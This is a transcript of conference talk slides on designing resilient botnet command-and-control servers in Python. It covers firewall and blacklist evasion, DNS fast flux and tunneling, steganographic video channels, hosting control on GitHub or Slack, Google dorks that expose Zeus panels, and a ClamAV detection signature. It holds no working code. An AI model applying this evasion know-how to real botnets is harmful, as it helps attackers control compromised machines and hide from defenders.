whoami Security researcher. Code monkey. Beer lover. Head of Red Team Ops. Primary security researcher Study bot nets with a focus on alt. CnC schemes Blog about stuff, sometimes. https://the-it-ninja.blogspot.com/ https://www.linkedin.com/in/daniel- reilly-58b28171
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
whoami
Security researcher. Code monkey. Beer lover.Head of Red Team Ops. Primary security researcher Study bot nets with a focus on alt. CnC schemes Blog about stuff, sometimes. https://the-it-ninja.blogspot.com/https://www.linkedin.com/in/daniel-reilly-58b28171
What this talk is NOT about Building Bots (There is plenty on this) Protocol details (There are a lot of them) Every CnC architecture
Storm Style P2P (Overnet) Exploiting anything (sorry!) Designing a web interface
What this talk IS about Designing Resilient CnC architectures Using Python to build cool stuff Virtuous vs. Malicious bot nets Trust anchors (public/private keys/passwords) Thinking about different ways to pass information.
Why R.Y.O. Avoid Detection
Keep your CnCs off blacklists by customizing their fingerprint Customize Attacks
Design your Control Servers with an idea of the objectives for your bots Only use communication methods that make sense in your environment. Do not use IRC. Pretty
much ever. Bypass Firewall Rules
Most companies still rely on Blacklisting or Whitelisting services. Most ACLs are IP based Hide your traffic better with all the other 'good' traffic
Widely available CnC dashboards are good targets for bot net takeovers Aditya Sood (2014)
Botnet TaxonomyA Bot net taxonomy model from North Western University's CS department. Attacking Behavior (Info stealing)Rally Mechanisms (static or random)Communication Protocols (DNS, HTTPS, etc.)Observable bot net activities (Host, Network and Global Correlated monitoring)Evasion Techniques (Fast Flux)
Multiple domains for DNS rally points. Fast Flux DNS server Ips for as many DNS servers as you can manage to harvest Private GitHub accounts, SIP servers, etc. Test your server UI for command and SQL injection Private Key sign commands and encrypted responses Station To Station Encryption
Avoid detection Use common communication protocols Encrypt traffic against MITM snoops Hide ports / pages from scanners (port knock & .htaccess knock)
Reasonably fast command propagation
~1ms – 10m (or max sleep time for a bot * 2) Avoids inbound connection attempts in IDS logs Avoids a lot of heartbeat beacons on the network
Layered/Distributed Architecture
Two examples of Distributed architecture. Web servers are API points which talk to the underlying DNS points
1. diagram 1 shows a bot master connecting via Tor to the CnC web layer which manage 4 rally points.
2. diagram 2 shows a recursive or “me-centralized” network where the primary cnc distributes commands to all other API points which repeat this until an API point with no rallypoints is reached.
Communication Channels HTTPS (HTTPLib)
Hides well in normal traffic Encrypted == Trusted (DPI mostly ignores it *see note below) GitHub, Slack, Twitter, Custom Site, etc.*As of IDP Release 5.0r2, Juniper IDP devices support inspecting HTTPS traffic without the servers private key Stego to obscure data transfers
SSH (Paramiko, SSHCommander) No client side piece (just an RSA key) https://github.com/dreilly369/SSHCommander Combine with onion routing for pseudo-anonymity
VoIP Asterisk & Pycall Twilio (network API, resilience built in,scriptable interface) Skype (network API, resilience built in, trusted by most firewalls)
DNS Fast Flux (Storm Worm 2007) style resilience Good for bypassing IP based ACLs Rally point layer and command layer in one
Where to put CnC Servers “Borrowed” Servers (Outside the scope of this talk)
Web shells Web App Exploits & Service Exploits
GitHub & other source code repos Almost no company blocks these sites Private accounts offer security Public accounts offer anonymity
Image/Video/File hosting sites S3 buckets, Dropboxes, Email Hosts, anywhere you can store information can become part
of your CnC architecture As mentioned videos are great storage containers acceptable on most networks You can even use other peoples accounts with Outjection (injection on POST data)
Slack Accounts Built FOR bots. The new era for IRC style centralized CnC
GitHub as a CnC platform
Generally Trusted Great for virtuous botnets, okay for malicious bots too. A good start on this was done by Justin Seitz in “Black
Hat Python”. To use the python library github3.py you need to
include it or wrap it in with your bot Discovery exposes all bots associated with that
GitHub branch. Activity can be monitored by anyone with bot credentials, even if they can't decipher contents.
Who knows who this is? What if 11B-X-1371 is a new method of CnC?
Around 3000 still images compose the 2:00 video Audio Track can also hide data (not just the Spectrographic images either).
YouTube, Vimeo, etc., all have posting APIs that make them great locations to communicate with bots.
Traffic to these sites is high on a lot of networks APT29 delivers HAMMERTOSS using Steganography already!
Demo LOSTDOG
DNS Fast Flux (boto.route53) Single Flux updates “A” Records (list of IP associated) for a domain.
Used to rapidly change the list of known servers available to bots. Can be other bots or CnC points.
Bypasses IP blocking Looks like a Load-Balancer unless you map it over time
Double Flux also updates “NS” Records Use this to change a bots DNS rally points Double flux is ~twice as hard to detect and block
All the “cool kids” are doing it. OpenDNS has a great talk on detecting DNS Fast Flux
https://www.youtube.com/watch?v=UG4ZUaWDXSs
https://en.wikipedia.org/wiki/Fast_flux DNS Robtex Analysis of a Fast flux domain
How to build the CnC Obfuscate communication channels
HTTPS Encryption Steganography Onion routing Port Knocking
Language: Python Paramiko (SSH module) Github3 Stepic (stego module) Py2Exe or PyInstaller to compile binaries tons of other goodness
Layered security Port Knocking protects the CnC HTTPS port from discovery by scanners HTTPS w/ HSTS protects from basic MITM snooping Station to Station encryption protects CnC → CnC communications Bots use Rally point polling for command verification Anchored off of the Bot Master's private key
DNS For Comm (tunneling) E.G. FeederBot, Morto (~2010)
Use valid DNS TXT record requests Inject Shellcode directly into memory
Hard to block Combining Fast Flux with DNS tunneling creates a resilient rally point layer All record types (MX, NS, A, TXT, C, etc) can be used so blocking TXT is
not an effective prevention mechanism. Drawbacks
DNS servers can be compared to network settings to develop alerts Can be slow by comparison to other protocols for data exfiltration
Demo DNSResponder
Python DNS Tunnel
HTTPS For Comm HTTPS Used to communicate larger amounts of data Multiple parts of the CnC arch. rely on this
Bot → Website data dumps Master → CnC command propagation CnC → Website Data retrievals
Larger bot commands Bot pulls new python modules from Github repo Allows for nearly limitless configurations of the CnC arch.
Drawbacks HTTPS by itself is only protection from casual observers HSTS can also be partially bypassed since SSLStrip+ (BH Asia 2014)
How NOT to Build the CnC RA1NX
unauthenticated “pubcall” method PHP/IRC portals in general
Torpig Reverse Engineered Domain Flux algorithm in bot Hijacked botnet because of trusting bots.
Zemra Bot Intentionally backdoored
ICE IX, Citadel, or Zeus Exposed through Google Dorks - inurl:\cp.php?m=login - inurl:\adm/index.php?m=login
Push Instead of Pull Good
Bots passively listen for commands on an SSH port Discovering a bot does not expose bot net size No knowledge of Bot Master to leak Good for CnC layer updating Talk given on doing this in javascript by Diogo Mónica and Carlos Ribeiro
https://www.youtube.com/watch?v=6iM2jbheJ-0 Bad
Relatively easy to block. Most networks block inbound connections or whitelist services
Not particularly fast. Mass Scanning brings A LOT of attention to your project. See the talk given by
Vissago at https://www.youtube.com/watch?v=UOWexFaRylM
Detecting private CnC Servers
HoneyNet YAPDNS for Fast Flux detection https://github.com/honeynet/yapdns Custom ClamAV/YARA Signatures DetectPyDNSResponder:0:646e736c6962*444e5352